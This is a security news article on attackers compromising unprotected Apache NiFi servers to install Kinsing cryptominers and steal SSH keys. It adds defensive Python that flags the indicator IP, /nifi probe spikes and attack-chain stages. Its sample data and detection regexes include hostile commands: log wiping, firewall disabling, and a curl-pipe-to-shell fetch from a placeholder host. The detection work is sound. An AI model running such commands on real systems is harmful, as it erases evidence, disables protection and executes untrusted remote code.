Financially motivated attackers are actively scouring the Internet for unprotected Apache NiFi instances, covertly installing cryptocurrency miners on them and using them as a springboard for lateral movement.
This finding comes from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests to “/nifi” on May 19, 2023.
“Persistence is achieved through timed processors or entries in cron,” said Dr. Johannes Ullrich, Research Director, SANS Technology Institute. “Attack scripts are not stored on the system. They are stored only in memory.”
The honeypot setup allowed the ISC to determine that the initial foothold is used to drop a shell script that deletes the “/var/log/syslog” file, disables the firewall, and terminates competing crypto-mining tools before downloading and launching the Kinsing malware from a remote server.
In September 2022, Trend Micro detailed an identical attack chain that leveraged older flaws in Oracle WebLogic Server (CVE-2020-14882 and CVE-2020-14883) to distribute cryptocurrency mining malware.
A separate attack by the same threat actor against a public NiFi server also executed a second shell script, designed to harvest SSH keys from the infected host in order to connect to other systems within the victim’s organization.
A notable indicator of the ongoing campaign is that both the scanning and the actual attack activity originate from the IP address 109[.]207[.]200[.]43, targeting ports 8080/TCP and 8443/TCP.
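The two concrete things this write-up gives a defender are a network indicator (one source IP hitting “/nifi” on 8080 and 8443, with a request spike on a single day) and a host-side behaviour chain (syslog wiped, firewall disabled, rival miners killed, a remote script fetched and run). The following Python is an added example, not code from the ISC or the SANS diary: it parses constructed access-log lines (the “vhost:port” prefix on each line is an assumed log layout, and the sample lines are made up for this example), flags requests from the published indicator to a NiFi port, counts “/nifi” probes per day to surface a spike, and matches process-execution records against illustrative command forms for the stages described above. The command patterns and miner process names in STAGE_PATTERNS are assumptions for illustration; the page does not reproduce the actual attack script.

```python
import re
from collections import Counter
from datetime import datetime

# Network indicator from the write-up, kept defanged in source and refanged on load.
IOC_IPS = {"109[.]207[.]200[.]43".replace("[.]", ".")}
NIFI_PORTS = {8080, 8443}

# Access-log layout assumed here: "vhost:port" prefix, then NCSA combined fields.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+):(?P<port>\d+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (not honeypot data); the 19 May burst mirrors the reported spike.
SAMPLE_LOG = """\
web:8080 198.51.100.7 - - [17/May/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 512
web:8080 198.51.100.7 - - [18/May/2023:11:00:00 +0000] "GET /nifi HTTP/1.1" 200 900
web:8080 109.207.200.43 - - [19/May/2023:03:14:15 +0000] "GET /nifi HTTP/1.1" 200 900
web:8443 109.207.200.43 - - [19/May/2023:03:14:16 +0000] "GET /nifi/ HTTP/1.1" 200 900
web:8080 203.0.113.9 - - [19/May/2023:04:00:00 +0000] "GET /nifi HTTP/1.1" 200 900
web:8080 203.0.113.10 - - [19/May/2023:05:00:00 +0000] "GET /nifi-api/flow/about HTTP/1.1" 200 300
web:8443 203.0.113.11 - - [19/May/2023:06:00:00 +0000] "POST /nifi-api/processors HTTP/1.1" 201 100
web:8080 198.51.100.7 - - [19/May/2023:07:00:00 +0000] "GET /healthz HTTP/1.1" 200 2
"""


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["day"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z").date().isoformat()
    return rec


def ioc_hits(lines):
    """Requests from a published indicator IP to a NiFi port (8080/8443)."""
    return [r for r in map(parse, lines) if r and r["ip"] in IOC_IPS and r["port"] in NIFI_PORTS]


def nifi_probes_per_day(lines):
    """Count requests whose path starts with /nifi (UI) or /nifi-api (REST) per calendar day."""
    counts = Counter(r["day"] for r in map(parse, lines) if r and r["path"].startswith("/nifi"))
    return dict(counts)


def spike_days(lines, factor=3, min_count=3):
    """Days whose /nifi count exceeds `factor` x the mean of the other days.
    The thresholds are illustrative, not the ISC's."""
    counts = nifi_probes_per_day(lines)
    spikes = []
    for day, n in counts.items():
        others = [v for d, v in counts.items() if d != day]
        baseline = sum(others) / len(others) if others else 0
        if n >= min_count and n > factor * baseline:
            spikes.append(day)
    return sorted(spikes)


# Host-side stage markers for the chain described above. The command forms and the
# miner process names are assumed for illustration; the page does not reproduce the script.
STAGE_PATTERNS = {
    "log_wipe": re.compile(r"\brm\b.*/var/log/syslog"),
    "firewall_off": re.compile(r"ufw\s+disable|iptables\s+-F|systemctl\s+stop\s+firewalld"),
    "kill_rivals": re.compile(r"\b(pkill|killall)\b.*\b(xmrig|kdevtmpfsi|minerd)\b"),
    "fetch_and_run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
}

# Constructed process-execution records (one command line each), not a real capture.
EXEC_SAMPLE = [
    "rm -f /var/log/syslog",
    "ufw disable",
    "pkill -9 xmrig",
    "curl -fsSL http://example.invalid/k.sh | sh",
]


def chain_stages(cmd_lines):
    """Return the set of stage names observed in a list of command lines."""
    return {name for cmd in cmd_lines for name, pat in STAGE_PATTERNS.items() if pat.search(cmd)}


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("IOC hits:", [(r["day"], r["ip"], r["port"], r["path"]) for r in ioc_hits(lines)])
    print("/nifi per day:", nifi_probes_per_day(lines))
    print("spike days:", spike_days(lines))
    print("host-side stages:", sorted(chain_stages(EXEC_SAMPLE)))
```

On the sample data the indicator matches the two 19 May requests from 109.207.200.43, the per-day count makes 19 May stand out against the single 18 May probe, and all four host-side stages are seen in the constructed command list. In practice the per-day spike test needs a longer baseline than two days, and the host-side patterns should be fed from auditd or an EDR process-creation feed rather than shell history, since the write-up notes the attack scripts live only in memory.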
“Being used as a data processing platform, NiFi servers often access business-critical data,” the SANS ISC said. “NiFi servers can be attractive targets because they are configured with larger CPUs to support data conversion tasks. NiFi servers are not secure.”